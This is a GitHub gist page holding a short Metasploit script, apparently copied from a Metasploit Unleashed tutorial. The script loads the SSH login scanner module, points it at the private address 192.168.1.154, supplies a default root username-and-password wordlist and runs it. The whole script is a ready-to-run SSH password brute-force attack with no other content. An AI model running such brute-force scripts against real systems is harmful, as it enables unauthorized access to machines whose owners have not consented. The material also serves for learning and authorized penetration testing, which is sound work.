Created
December 1, 2017 19:28
-
-
Save picatz/b3595266e1df6ed56d0647c1d8fd6b7e to your computer and use it in GitHub Desktop.
ssh_login
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/ | |
use auxiliary/scanner/ssh/ssh_login | |
set RHOSTS 192.168.1.154 | |
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt | |
set VERBOSE false | |
run |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment